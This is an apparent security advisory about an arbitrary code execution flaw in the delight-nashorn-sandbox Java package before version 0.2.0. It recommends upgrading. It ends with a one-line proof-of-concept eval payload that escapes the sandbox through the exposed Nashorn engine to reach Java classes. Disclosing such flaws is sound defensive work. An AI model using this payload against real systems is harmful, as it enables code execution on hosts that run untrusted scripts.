Arbitrary Code Execution Affecting org.javadelight:delight-nashorn-sandbox Open this link in a new tab package, versions [,0.2.0)
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.Test your applications
4 May 2021
3 May 2021
Max Rohde, Anthony Weems
Introduced: 3 May 2021CWE-94 Open this link in a new tab
How to fix?
org.javadelight:delight-nashorn-sandbox to version 0.2.0 or higher.
Affected versions of this package are vulnerable to Arbitrary Code Execution. It exposes an instance of
NashronScriptEngine through the
sandbox.eval("delete this.engine; this.engine.factory.scriptEngine.compile('var File = Java.type(\"java.io.File\"); File;').eval()");